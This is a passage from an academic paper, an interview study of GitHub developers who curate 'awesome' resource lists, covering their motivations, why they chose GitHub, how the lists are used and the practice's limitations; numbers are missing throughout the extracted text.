( ), the appropriation of github for curation. peerj comput. sci. :e ; doi . /peerj- cs. https://peerj.com mailto:yuw @psu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. and follow function) (dabbish et al., ; marlow, dabbish & herbsleb, ; singer et al., ; wu et al., ). 
in addition to hosting and collaborating through the use of github repositories, a new category of practice has recently emerged—software developers have begun appropriating github repositories to create public resources lists (wu et al., ). such practices are recognized as curation—activities to select, evaluate, and organize resources for preservation and future use (duh et al., ). in and , github repositories, such as awesome-python (https://github.com/vinta/awesome-python) and awesome-go (https://github.com/avelino/awesome-go), which curate resources about programming topics, gained vast popularity on github. the number of curation repositories has steadily increased since then and many of them have remained among the most famous repositories on the entire platform (wu et al., ). in light of the broad popularity of curation practices on github, one might expect that motivations to participate in them and reasons that they are hosted as github repositories rather than external websites are well-understood. however, research exploring the ways that social coding repository features have been appropriated for resource curation is sparse. in fact, the investigation of curation practices on social media has only recently begun and remains under-explored in general (duh et al., ). the existing curation literature focuses on microblogging services (i.e., twitter) (duh et al., ; dabbish et al., ; greene et al., ) and media sharing service (i.e., pinterest), leaving the nature of curation in software development practices untouched as an area of exploration. to address this gap in the literature, we conducted semi-structured interviews with github curators to better understand motivations to engage in this practice. in doing so, our study aims to investigate: ( ) developers’ motivations that drive curation practices; ( ) why github is chosen for this purpose; ( ) how curated resources are used; and ( ) current limitations and potential future improvements for curation on github. our results suggest that curation practices on github mostly grow out of software developers’ internal (altruism) and extrinsic motivations (personal needs and peer recognition). software developers choose github to perform curation practices mainly because this platform provides convenient tools and attracts vast groups of people with common interests. software developers also benefit from curation in many aspects such as better software development support, efficient learning tools, and communication with the community. further, curation represents a case that a collaborative working space is appropriated to an end-product for communicating high quality resources, suggesting github repositories can be used for communication purposes to support the larger community of software developers. however, current curation practices are restricted by document format, curation process, and are bounded by github features. the addition of built-in tools, such as navigation support within curation projects and automated resources for updates and evaluation, hold potential for improving current practices. our study contributes to a better understanding of software developers’ motivation to curate resources and the nature of appropriating github features for curation. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/vinta/awesome-python https://github.com/avelino/awesome-go http://dx.doi.org/ . /peerj-cs. 
background this section reviews previous literature that explores individuals’ motivation to curate, tools for curation, and current curation practice on github. motivations to curate in the social media era curation is a common practice in archeology. it is the activity of collecting, evaluating, organizing, and preserving a set of resources for future use (bamforth, ). in the internet era, technology assists curation is commonly referred to by librarians and archivists as ‘‘digital curation’’ to preserve digital materials (higgins, ). it can share features used for social bookmarking, where users specify keywords or tags for the internet referencing that helps organize and share curated resources with a larger community (farooq et al., ). there are several early popular social bookmarking tools, such as del.icio.us, which allows sharing of personal bookmarks (golder & huberman, ); flickr, a photo tagging and sharing service (marlow et al., ); and reddit, a community-driven link sharing, comment, and rating service (singer et al., ). curation behaviors have been further studied since social media was appropriated to enable new forms of curation. specifically, duh et al. ( ) report the use of a third party tool, togetter, for curating tweets, and uncover the intended purposes for these curated lists, including recording a conversation, writing a long article, or summarizing an event (duh et al., ). zhong et al. ( ) conduct surveys of pinterest and last.fm users and find that the majority users engage with the curation site for personal interests rather than social reasons (zhong et al., ). a recent study examines the ways that communities leverage a variety of social tools for curation to support vital community activities in a large enterprise environment (matthews et al., ). the authors also call for future studies on curation in public internet communities (matthews et al., ). curation on github is a unique instance of curation set apart from the above studies in the following ways. first, the user body of github is drastically different. services like twitter, pinterest, and reddit, are services for the general population with diverse backgrounds and interests, while github is intended for a focused community of software developers. members of the software developers’ community share a set of common goals and practices, which is likely to affect their participation in curation practices as well. second, unlike pinterest, which itself is designed for curation of links, github is an online work platform designed for software developers to collaborate with others on software projects, and curation is an appropriation of the collaborative coding features of the platform. the reasons behind such appropriation and whether github features fully meet curation needs of developers are yet to be discovered. third, the technology affordances of github largely depart from the above mentioned services. tools like pinterest and flickr, are designed for personal collection and sharing of hyper links. reddit allows users to vote to promote links, but it hardly preserves resources. github provides a collaborative working space, i.e., the repository, where software developers can work on the same project together and are enforced by git workflow. therefore, github is distinct regarding user base, intended purpose, as well as technology affordances. its appropriation for curation purpose raises an interesting question concerning user’s motivations and experiences. wu et al. ( ), peerj comput. sci., doi . 
/peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. software developers’ motivations for participating online communities researchers report two main categories of motivations that drive software developers’ voluntary participation in open source software projects: ( ) internal motivations, i.e., intrinsic motivations, altruism, and community identification, and ( ) external rewards, including expected future rewards and personal needs (hars & ou, ; ye & kishida, ). internal factors include ‘‘intrinsic motivation’’, which refers to the feeling of competence, satisfaction, and fulfillment as a motivator to participate in open source projects; ‘‘altruism’’ refers to software developers desire to care for others’ welfare at own cost; and ‘‘community identification’’ refers to individual software developers’ alignment of goals with the larger community. external factors include ‘‘future rewards’’ that are inured when software developers view their participation as investment, and expected future returns, including revenues from related products and services, human capital, self-marketing, and peer recognition; ‘‘personal needs’’ are software developers’ personal demand for their activity, for example, perl programming language and apache web server both grew out of software developers’ self-interests to support their work (hars & ou, ). both internal and external factors are important motivations that drive software developers’ participation in open source projects. the rise of social media impacts the way software developers participate in online space. social media are often referred to as socially enabled tools, where social features are added to software engineering tools (storey et al., ). it lowers the barrier to publishing information, allows fast diffusion, and enables communication at scale, which facilitates a ‘‘participatory culture’’ in the software developers’ community (storey et al., ; jenkins et al., ). as a result, software developers increasingly participate in the community via social media that enhances learning, communication, and collaboration (dabbish et al., ; doll, ; singer et al., ). similarly, software developers are motivated to participate in order to satisfy personal needs (e.g., improve technical skills) and to gain peer recognition (e.g., recognition by the community) (storey et al., ). despite the well-studied motivations for software developers’ participation in online communities, software developers’ motivation to engage in curation practices within github by appropriating a collaboration software development features are currently under-explored. prior github research github has drawn attention from researchers in recent years, who have examined its features that promote transparency, such as activity traces, user profiles, issue trackers, sourcecode hosting,and collaboration(storey et al., ; dabbish et al., ). researchers have examined in detail how such transparency allows software developers to engage with software practices in the community (dabbish et al., ; doll, ; singer et al., ). for example, dabbish et al. ( ) find that the activity logs and user profiles on github motivate members to contribute to software projects (dabbish et al., ). marlow, dabbish & herbsleb ( ) discover that developers use a variety of social cues available on github to form impressions of others, which in turn moderates their wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
figure a part of the readme.md file of awesome-go curation project. collaboration (marlow, dabbish & herbsleb, ). singer et al. ( ) put github in a largersocial mediaenvironment, and learnedthat softwaredevelopers leverage transparency of socially enabled tools across many social media services for mutual assessment (singer et al., ). these studies focus on how the technology accordances of github and other social media affect software practices, including learning, communication, and collaboration (storey et al., ). curation as an emerging practice on github raises interesting questions as to the reasons that such practice is thriving in the software developers’ community, why it emerges and gains popularity on github, and whether github features fully support this type of practice. appropriating github for curation curation practices are enabled by github features. specifically, github introduces a readme.md file in the root directory of each repository. the contents of the readme.md file are displayed in the front page of the repository, i.e., if a user visits the url of a software repository hosted on github in a browser, the readme.md file will be displayed as a web page (fig. ) (https://github.com/avelino/awesome-go) along with repository structure and some project statistics, such as the number of forks and wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/avelino/awesome-go http://dx.doi.org/ . /peerj-cs. stars (mcdonald & goggins, ). the content of reame.md file can be structured with markdown syntax (https://help.github.com/articles/basic-writing-and-formatting- syntax), which provides rich text features, including table of contents, links, tables, etc. readme.md is designed for adding description and documentation for a repository (https://help.github.com/articles/create-a-repo). curation on github appropriates the readme.md file of a repository to create a list of resource indexes within one page. it categorizes resources into different themes and differentiates them into sections. typically, each resource is recorded with the resource name and a brief description of the resource (see fig. ). in addition, urls are attached to each of the curated items. clicking a resource name (shown in blue in fig. ) will direct the user to the real web location of the resource. methodology to explore and understand software developers’ experiences appropriating github for curation, we conducted a qualitative study with curation project owners. the study was approved by penn state university institutional review board, under the approval number prams . in this section, we describe our recruitment procedure, interview protocol, and data analysis processes. participants recruitment to identify participants engaged in curation practices, we queried the github search api on / / using the keyword ‘‘curated list’’ to search for curation repositories. the query returned repositories hosted on github. we recorded the owner’s user id for each repository in the list, then we queried github api again to fetch profiles with email addresses of each id. the query returned unique owners with email addresses, which we used to create a randomized list and sent email invitations to curation project owners. recipients were asked to engage in a semi-structured online text-based interview carried out via facebook messenger, skype, or google hangouts. we began our recruitment process in early december and completed all interviews in late january . 
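as an illustration of the repository search step described above, the following is a minimal python sketch of a query against the github search api; the query string mirrors the keyword used in the study, while pagination, date handling, and authentication are simplified and the exact parameters used by the authors are not reproduced here.

```python
import requests

def search_curated_repos(page=1):
    # one page of repositories matching the "curated list" keyword
    resp = requests.get(
        "https://api.github.com/search/repositories",
        params={"q": "curated list", "per_page": 100, "page": page},
        headers={"Accept": "application/vnd.github+json"})
    resp.raise_for_status()
    return resp.json()["items"]

owners = {repo["owner"]["login"] for repo in search_curated_repos()}
# owner profiles (including any public email address) can then be fetched
# from https://api.github.com/users/<login>, as in the second query described above
```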
the resulting participants included males and one female with github experiences ranging from six months to six years. fourteen of the participants are professional software engineers, one was a graduate student, and one was a microbiologist. eleven participants used the descriptive word ‘‘awesome’’ as the prefix to name their curation repository. the participants had a varying number of followers: five had less than followers; eight had between and followers, and four had more than followers. in the following section, we refer to individuals by participant number (from p to p ). interview protocol we conducted text-based online interview with participants, and each discussion lasted approximately to min. the interviews were semi-structured by the four general areas below. • motivations to curate resources, • reasons for technology choice (github), wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://help.github.com/articles/basic-writing-and-formatting-syntax https://help.github.com/articles/basic-writing-and-formatting-syntax https://help.github.com/articles/create-a-repo http://dx.doi.org/ . /peerj-cs. table summary of the coding scheme. theme category count (n = ) altruism personal needs curator motivations peer recognition familiarity with github reasons for appropriating github relevant context and audience supporting work learning a new topic usefulness of curated list communication immature format hard to maintain limitations of curation difficult to market • how curated lists are useful, • the limitations of current curation practices (on github). questions were administered conversationally to engage the participants, and they were open-ended enough that we could pursue new topics raised by the participant. participants were interviewed in english. the interview scripts were then downloaded for analysis. data analysis procedure we conducted our iterative analysis through four rounds of interviews allowing the first round of analysis to guide our second round of interviews, and following similarly in the third and the fourth. themes and codes were identified, discussed, and refined in this process (lacey & luff, ). in the first round of analysis, we performed open coding on the responses (strauss, ), grouping examples that are conceptually similar. for each subsequent round of interview, we compared concepts and categories that are similar to previous ones. and in this process, we continued to refine our coding scheme while also revealing new ones. we discussed the codes collaboratively and repeatedly. we concluded the study after reaching the point of theoretical saturation, when categories, themes, and explanations repeated from the data (marshall, ). a second researcher independently coded four sample interviews transcripts. our analysis showed inter-coder agreement between the two researchers (kappa = . ). in the process of coding, we recognized that some themes and categories are consistent with prior literature, i.e., curator motivations (altruism, personal needs, and peer recognition). instead of developing new categories, we labeled them according to existing literature. the complete coding scheme is shown in table . results the results of our analysis describe curation practices on github from the aforementioned four aspects, including ( ) motivations to curate, ( ) technology choice, ( ) the use of wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
curated resources, and ( ) the current limitations of curation practices on github. the analysis is presented through a count of themes present in coded interviews (table ) and representative quotes from each of the four themes. motivations to curate internal factors (i.e., altruism, community identification, and intrinsic motivation) and external rewards (i.e., personal needs and peer recognition) are identified as motivating factors in software developers’ participation in open source software projects (hars & ou, ). in this study, our participants confirmed altruism ( . %), personal needs ( . %), and peer recognition ( . %) motivated their participation in curation projects. internal factors—altruism participants reported that they engaged in curation practices because other community members might benefit from their effort. for example, p believed the high quality of curated resources could help beginners with programming: ‘‘i see so many people when they take introductory classes in programming, they come to github to get ready repositories...and that is overwhelming at first...so to get the started and motivated with programming i thought of collecting resources together in (p ’s curation project)’’—p p wanted to help people who were in a similar position to himself: ‘‘i’m a kind of remote engineer, then i want to create a list for someone tend to like me about product manager list, i just want to save some links for my learning purpose ... then public for someone if they’re in need’’—p external rewards personal needs and peer recognition form software developers’ external rewards derived from participating in open source projects (ye & kishida, ). these rewards also drive engagement in curation practices. personal needs were the most discussed reason for participation in curation ( . %). specifically, software developers reported that curation repositories improved productivity and enabled communication with others. before creating curation projects, half of participants who were familiar with a particular set of resources relied on search engines whenever they tried to locate the url of the resource. one important reason they chose to curate resources was to avoid such repetitive search efforts. ‘‘before making the repo i had to do research each time i needed a (p ’s curation topic). now that i have a list, i just refer back to it when needed.’’—p ‘‘i simply created my own list of the sites i found to be good. the idea really was to get out there scout for sites once and then be able to come back to a list without worrying about it having sites i found bad.’’—p in addition, a curated repository has a permanent url, which was reported as a convenient way to share resources with others who were outside of curation repositories. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. participants stated that with curation projects, they only needed to point others to the urls of their curation repositories. it was both convenient for them to share and for others to find. for example, p created the curated list so that she could conveniently share curated resources with others. peer recognition surfaces as another important motivation for software developers’ participation in curation practices on github. the community of software developers on github adopts a particular way to endorse curation projects. a highly reputable software developer on github, sindre sorhus ( . 
k+ followers), creates the ‘‘awesome’’ (repository name) project on / / , which is a meta list of curated lists (https://github.com/sindresorhus/awesome). it contains a community drafted ‘‘awesome manifesto’’ (https://github.com/sindresorhus/awesome/issues/ ), which depicts guidelines and standards for curation practices, and requires that curation repositories conform to it if they want to be included in this meta list. the project currently has around , watchers, more than , stars, and approximately , forks, ranking the nd most starred repository created after / / (https://github.com/search?utf =%e % c% &q=created% a% e - - +stars% a% e &type=repositories&ref=earchresults). out of participants used ‘‘awesome’’ as a prefix to their curation project name in an effort to conform to the naming convention as well as to indicate the quality of the content. of them mentioned that they were inspired by the original ‘‘awesome’’ project. of them hoped to get their curation repository indexed by it, and one participant’s curation project was already included in the ‘‘awesome’’ list, who felt a great honor (p ). p reported putting effort forward to improve his curated list to conform to the guidelines and standards as defined by the ‘‘awesome’’ project, stating ‘‘...with the awesome endorsement i’m hoping it becomes a collection people trust’’ (p ). it demonstrated that our participants were putting efforts to align their goals with the larger community, i.e., conforming to the community standard for curating high quality resources, and would like to be recognized by the community. in addition, p reported that her involvement in curation efforts helped her obtain her current job, and p reported that a company approached him and wanted to collaborate with him on his curated content. these rewards emerged as side-effects of curation efforts, not one of the guiding motivations for software developers to begin a curation project. the technology choice—why github compared to the github platform, the features on sites like wikipedia might be considered better suited for hosting curation projects by providing convenient editing and collaborating features. however, popularly used and referenced curation projects for software developers are predominantly hosted on github, whose features and information structures are designed for source code hosting and project collaborating (marlow, dabbish & herbsleb, ; storey et al., ) rather than creating and preserving lists of resources. in this section, we will address why curation has emerged as a common way to appropriate github repositories. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/sindresorhus/awesome https://github.com/sindresorhus/awesome/issues/ https://github.com/search?utf =%e % c% &q=created% a% e - - +stars% a% e &type=repositories&ref=earchresults https://github.com/search?utf =%e % c% &q=created% a% e - - +stars% a% e &type=repositories&ref=earchresults http://dx.doi.org/ . /peerj-cs. familiarity with github participants reported that software developers’ existing knowledge about github and its features, i.e., their strong media literacy (storey et al., ) with github, prompted them to choose this platform to host curation projects. in general, software developers are familiar with github’s text editing format (i.e., markdown syntax) and are comfortable using it. 
p and p both claimed that ‘‘github was a tool that i was familiar with’’ and ‘‘so yes github would be a more natural tool to use.’’ specifically, software developers are accustomed to writing and formatting text contents with markdown syntax. for example, p expressed that ‘‘...i love write in markdown format!’’, and p considered that ‘‘github has a really easy way to write content in rich format (using markdown) and view it.’’ ‘‘...as developer, i think github is the best place for developer to collaborate with other to build good resource.’’—p intimate knowledge about github collaborating features is another factor: ‘‘github is a really good platform to collaborate. anyone could come, fork it, extend it and ask me to ‘merge’ it (update my list).’’—p ‘‘...the advantage of using github is other people can contribute easily.’’—p relevant content and potential audience participants also chose github for curation because: ( ) the curated contents were relevant within the github context, ( ) there was a large potential audience on github, and ( ) the github community encouraged contributions. a total of out of participants’ curation projects were related to software development practices. they considered github just suitable as a platform for sharing software development related contents: ‘‘...(it is) the place to be for projects like this’’ (p ). github has attracted a large base of like-minded users when it comes to software devel- opment, which increases the chances of matching resources with an interested audience: ‘‘github has a very large audience/devs actively spending time in it, so it’s definitely the right place to publish a project such as this...’’—p in addition, hosting curation projects on github encourages contributions. github has many collaborative features. it is a common practice on github for users to contribute to other projects (dabbish et al., ; marlow, dabbish & herbsleb, ; wu et al., ). p reported that ‘‘github can target at the right audience, and contributing is encouraged more...’’. p claimed that ‘‘...enable other people to (freely) contribute to it is very important to me (and i think other curators also feel the same) so a git hosting site is ideal.’’ participants also believed that other people on github, who had more experiences and knowledge than themselves and other could enhance the repositories by contributing to lesser developed parts of the repository. ‘‘the main reason is collaboration...i may have some resources but other people may have even better stuffs or ideas to share.’’—p wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the use of curated resources curated resources are useful for software developers to support their work, learn about a new topic, as well as communicate with others. supporting work software developers rely on others’ work to accomplish their own projects. participants reported that they used different curated lists, including their own, as bookmarks or references to quickly locate the resources they need. ‘‘before making the repo i had to do research each time i needed a (resources). now that i have a list. i just refer back to it when needed. 
it serves as a good toolkit for future projects.’’—p ‘‘i recently have created a python repository and since i was not used with python at all, i used awesome-python to know some libraries recommended by the community.’’—p in addition to supporting their work, participants also used the curation repository to keep track of high-quality resources in case they need them in the future. for example, ‘‘if i used it or i’m planning to use it, i’ll add it there. if the resource is well written with tests and should be considered while selecting specific category, i’ll add it too... but also i add (resources) that i checked already and found it interesting for the future projects.’’—p learning a new topic when first encountering new development related topics, software developers often find themselves feeling overwhelmed. the complex information scope in the software developers’ community makes it hard for developers to start tasks quickly. for example, p reported that ‘‘when we start to learn new thing, there are many things, we cannot know what should to spend time on.’’ a curated list that provides centralized peer-reviewed resources about a specific topic provides a starting point where developers know that they can find high-quality resources and begin learning the subject. ‘‘...i’m an ios engineer. but someday i like to learn ruby, i just go to awesome-ruby and pick some recourse for beginner. googling is not going to help us like that.’’—p ‘‘so say if i starting to learn a new tool and need to get started quickly. i might go to the main awesome list and search for it.’’—p communication communication is essential among software developers in order to transfer knowledge between stakeholders, as well as facilitate learning, coordination, and collaboration (storey et al., ). curation serves important communication purposes, including reduction of communication costs and creating a shared knowledge space. ‘‘i’m relative active in the meetup community in (p ’s location). talking to people, there is always a lot of talk about what makes a good (p ’s curation topic). i created wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. list so that i can point to other easily... i refer a lot of people to the list who are looking at improving their (p ’s curation topic).’’—p one can share the content of resources with others in the current time as well, as reported by p : ‘‘...i sometimes encounter people who’ve watched (p ’s curation repository) and didn’t really like them, but my hunch is they haven’t seen the great ones, so i send them to check out my list to see if i can convince them otherwise...’’—p limitations of using github for curation in this section, we summarize constraints that our participants have encountered when carrying out curation on github. immature structure and format of current curated lists the readme.md file on github typically includes an introduction to each project and current curation practices mainly rely on that single readme.md file to list all curated resources. sometimes a list may grow excessively long. 
participants complained that ‘‘resources are not searchable (when on a list)’’ (p ), and it was cumbersome for them to navigate through a long list: ‘‘the only thing sometimes that nags me is that some of them are very long, which in some sense defeats the purpose.’’—p in a case where a curated list was too long, p created a shorter version of the same topic by selecting resources most important to him: ‘‘there is another remote list...lot of stars, around k or more, but i find it that there are lots of resources, then when i look into, i’m scared of. then i want to create my own list, just something i think useful for most.’’—p another issue raised is that the brief description of each item in the curated list (noted in fig. ) can be incorrect, inaccurate, or misleading: ‘‘bad description doesn’t allow finding the required resource.’’—p further, although these curated lists are intended to be collaborative efforts (i.e., multiple people suggest adding, deleting, or updating entries), there is no intuitive way for an audience to express their opinions or raise uncertainties about resources, only modify content. one participant suggested including a rating system in the curated list to help audience filter resources: ‘‘...maybe it would be better we could like/dislike the resources ...sometimes the resources are sorted by name when popularity would be a better option... something like this would give us an overview of how much important some entry in a list is for the community.’’—p wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. excessive efforts to filter and maintain resources it requires a lot of time and efforts to navigate in this complex information space where curation takes place and to filter a handful of good resources. p emphasized the time constraints for curation: ‘‘time. time is hard...digging through all of these resources takes time, and i’m usually pretty time constrained.’’ (p ). due to the fast changing nature of the software industry, old resources become outdated and new resources emerge instantly. curation repositories require efforts to be simply maintained, including getting rid of the outdated resources, and adding state-of-the-art resources. p reported that one drawback of the current curation practices was that curated resources have ‘‘no quality update.’’ difficulties for marketing although github contains a vast and relevant user base, it does not provide mechanisms for a repository owner to distribute the list directly to the relevant audience. our participants expressed that it was hard for them to target their repositories to users who were interested in the curation topic. for example, p conveyed his desire to recruit more contributors: ‘‘the only drawback is the lack of pull requests. i want more... (i want to) discover datasets i missed.’’—p and p found that it was demanding to reach out to both potential collaborators and consumers: ‘‘while it’s easy to host a project on github, you still need to put effort into marketing it, so you get other people contributing or finding it.’’—p unlike social media services such as facebook, which automatically curates and recommends personalized content for each user, github only contains technical features to allow users to search for information. if github users are not aware of the existence of such curation projects, it would be difficult to find these resources in the first place. 
therefore, admitting curation projects are embedded in the context of an abundant potential audience, they still lack mechanisms and features for marketing to parties of interest. discussion our study provides an in-depth view of curation practices on github. we first assessed curator motivations in participating in curating activity, and compared them with motivations in open source participation literature. then, we analyzed the reasons that github was chosen for curation purposes. next, we evaluated the implications of curation repositories to software developers’ community. and finally, we uncovered the current limitations of curation practices. in this section, we generalize these main findings and discuss design suggestions with the hope to improve curation practice in the future. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. curator motivations one primary motivation for engaging in curation is altruism, which is also widely recognized as an important motivation for software developers’ participation in open source projects (hars & ou, ; lakhani & wolf, ; ye & kishida, ). this finding indicates that helping behaviors may be a common reason why software developers are motivated to participate in some online activities. thus, when designing systems for facilitating software development related practices, we should consider software developers’ desire to support each other. enjoyment-based intrinsic motivations are the primary reason that software developers take part in open source projects, but were not specifically mentioned by the participants as a drive for engaging in curation. researchers have learned that intrinsic motivations drive software developers to spend more time and effort on open source projects (lakhani & wolf, ), and it is positively reinforced by community recognition (ye & kishida, ). therefore, many software developers commit themselves to open source projects for a relatively long time. at the same time, altruism alone is recognized as an unsustainable incentive for open source participation (ye & kishida, ). the comparison of motivations to curation with participation in open source projects leads to questions concerning curators’ long-term engagement, such as whether intrinsic motivations are involved in driving curators, whether altruism can sustain curator’s long-term participation in curation activities, and if not, whether there is a mechanism that regularly feeds curators’ motivations to curate. the answers to these questions are beyond the scope of this study and requires further investigation. leveraging github as a tool for communication while github is known as a tool for software projects hosting and collaborating (dabbish et al., ; marlow, dabbish & herbsleb, ), and communicating knowledge in software artifacts (storey et al., ). this study finds that github is also a good tool for communication of socially generated resources for developers. here, we describe the features that have supported this practice. first, github features allow curation repositories to be shared easily. with a robust version control system as we as uniquely assigned public url for each github repository, github guarantees the integrity and durability of curated contents and enables easy sharing. these technical features make github repositories ideal for communicating resources with others. second, github attracts potential audiences who can contribute to curation repositories. 
by connecting to a relevant audience group, github allows others to suggest potential curated items and evaluate existing ones. as such, the emergence of curation repositories indicates that the software developers' community has started to utilize github for communicating knowledge that is socially generated and maintained (storey et al., ). github as a communication tool demonstrates its flexibility and reconfigurability. with a simple appropriation of its features, github becomes a favored tool for curation purposes in the software developers' community. such reconfigurability will lead to other practices besides curation, which can further benefit the software developers' community. for example, github users started to appropriate github repositories to write and publish software development related books (https://github.com/getify/functional-light-js/), which accepted community suggestions as well as changes. also, software developers initiated the sharing of training materials, allowing others to discuss related matters as well as contribute improvements (https://github.com/kentcdodds/es -workshop).

curation to strengthen software developers' community
onboarding new members and educating existing members are essential for communities of practice to sustain and grow (lave & wenger, ; wenger, ; wenger & snyder, ). the results of this study demonstrate that curation repositories on github reflect these core utilities of communities of practice. software development related resources are changing rapidly, and software developers usually rely on a number of services and channels, such as stack overflow and twitter, to keep themselves up-to-date with the trend (storey et al., ). by centralizing peer-reviewed resources in an active community with a relevant audience, curation repositories create a reliable channel that simplifies the process of discovering high quality resources. they are likely to reduce the amount of effort individual members of the community spend on locating and filtering resources. in addition, as the curated resources are peer-reviewed, they are more likely to guide one's learning of a certain topic than random resources encountered on the internet. thus, curation repositories optimize the way that resources are disseminated and consumed in the software developers' community, which in turn helps the community to grow. the importance of curation for the software developers' community also raises interesting questions concerning the professional trajectories of the curators in the community. curators connect resource providers, i.e., software developers who develop tools, packages, frameworks, etc., with resource consumers, i.e., software developers who need to learn or work with tools, packages, frameworks, etc. in this sense, they are similar to brokers, who bridge different groups and control information flow in a community, and often bargain for better terms because of their unique positions (burt, ; burt, ; van liere, ). however, the existing studies of brokers take place either in the corporate environment (burt, ; burt, ) or in community networks (carroll, ), and the brokerage results from establishing social connections, which leads to social capital gain (carroll, ; burt, ; van liere, ). in contrast, curators broker information by creating artifacts in an online social network environment.
in this study, we have one participant who obtained a new job in part due to her work on a curation repository. however, whether curation helps curators bargain for better terms in general, and whether curators established social ties and how long such social ties exist as a result of curation requires future investigation. design implications and future directions our analysis describes github as a technical infrastructure that meets the needs of curation practices. however, there is still substantial room for curation practices to improve. our participants found that curating software related contents required a great deal of effort to filter resources and to actively maintain the existing ones. in addition, as the length of wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/getify/functional-light-js/ https://github.com/kentcdodds/es -workshop http://dx.doi.org/ . /peerj-cs. the curated list grows, it also creates navigational difficulties. the current conditions could be improved by ( ) empowering curation with automated filtering tools, and ( ) adding navigational support within a curated list. automated tools can reduce the amount of effort curators need to spend on curating processes. curators currently do manual selection and evaluation of potential resources as well as eliminating outdated resources. selections are usually achieved by employing search engines or following recommendations from others. automated tools can help curators reduce the manual efforts spent on finding and maintaining resource lists. for example, some of our participants manually refer to third party tools to check resources status, such as last-updated-date. an automated tool that checks and filters resources according to query fields can largely diminish the noise and reduce time and efforts to select and evaluate resources. in addition, an automated tool can also help maintain existing resources, by checking whether a software project is still under active development or it is deprecated. providing navigational support aims at solving the following issues: ( ) lengthy curated list, ( ) lacking a search function, and ( ) lacking common themes across different curation projects. to be more specific, anchored table of contents, which is fixated on the screen, gives readers a clear structure of a document, as well as enables them to jump among sections. this change would make navigating a long list easier. adding a search function within a curation repository, allowing users to query keywords of the curated items, can help users explore and find ideal resources promptly. also, templates can provide common structure and themes in different curation repositories. for instance, our participants mentioned that one of the features they wanted for each curation repository to have was to include a beginner’s section, where they could easily find out hands-on resources. curation repositories could adopt a template that includes commonly identified themes, so that users will be familiar with the structure of different curation repositories and thus locate resources more efficiently. future work should seek feedback from github users who are consumers of resources in curation projects. together with what we have learned from this study, we will design and implement tools to help curators select, evaluate, and maintain resource lists more effectively, and allow users to navigate and retrieve desirable resources readily. 
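one concrete form the automated maintenance tooling suggested above could take is a link-status checker that periodically probes every curated url and flags entries that no longer resolve. the sketch below is illustrative only and not from the paper: the url list is a placeholder standing in for items parsed out of a readme.md, and the ''status >= 400'' cutoff is an assumption.

```c
/* minimal sketch of the kind of automated maintenance tool suggested above:
 * check each curated url with an http head request and flag broken entries.
 * the url list and the failure cutoff are illustrative assumptions. */
#include <stdio.h>
#include <curl/curl.h>

static long probe(CURL *curl, const char *url) {
    long status = 0;
    curl_easy_setopt(curl, CURLOPT_URL, url);
    curl_easy_setopt(curl, CURLOPT_NOBODY, 1L);          /* head request only */
    curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);  /* follow redirects */
    curl_easy_setopt(curl, CURLOPT_USERAGENT, "curated-list-checker");
    if (curl_easy_perform(curl) == CURLE_OK)
        curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &status);
    return status;  /* 0 means the request itself failed */
}

int main(void) {
    /* placeholder entries standing in for urls parsed out of a readme.md */
    const char *urls[] = {
        "https://github.com/avelino/awesome-go",
        "https://example.org/some-retired-tutorial",
    };
    curl_global_init(CURL_GLOBAL_DEFAULT);
    CURL *curl = curl_easy_init();
    if (curl) {
        for (unsigned i = 0; i < sizeof urls / sizeof *urls; i++) {
            long code = probe(curl, urls[i]);
            if (code == 0 || code >= 400)
                printf("flag for review: %s (status %ld)\n", urls[i], code);
        }
        curl_easy_cleanup(curl);
    }
    curl_global_cleanup();
    return 0;
}
```

the same loop could be extended to query each github repository's metadata (for example, its last-push date) to spot projects that are no longer actively developed, which is the ''last-updated-date'' check participants currently perform by hand.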
limitations our study was a qualitative investigation of self-reported curation practices and experiences of github developers. more specifically, we did not carry out a controlled study to manipulate hypothesized causal relationships among constructs. also, due to our limited sample size, cross tabulations among responses were unlikely to be generalizable to the larger population of curation repository owners. a general limitation of qualitative field methods is that some well-known approaches to validity, associated with positivist science, cannot be employed, such as construct validity, statistical validity, or predictive validity. for a qualitative research design such as ours, credibility and transferability are key validity issues: credibility is whether the results are believable and transferability refers to the degree to which the results can be transferred to other settings (guba, ; hoepfl, ). wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. credibility. we tried to ensure credibility by having two researchers code the data independently, and then calculating the kappa statistic to assess coding agreement. in addition, we used member checking in the interview process to have participants directly corroborate findings. these two approaches were encouraging and convergent, indicating very good credibility for our reported findings (lincoln & guba, ). we acknowledge that this is only a starting point in understanding curation practices in github, but it succeeded in raising many issues that could be pursued now in more constrained research designs. transferability. there are several potential threats to the transferability of this study. first, the owners of the most popular curation repositories did not respond to our interview invitation. given those celebrity curators’ massive audience base and extensively received contributions and attentions, their motivations and practices might be different from the general curators we focused in this study. second, the way we recruited our participants was to use the keyword ‘‘curated list to search through repository descriptions on github and identified repository owners as our potential interviewers. this search method is transparent and direct, but may have missed curation repositories and owners that did not self-identify with our keywords. follow-up research can expand the 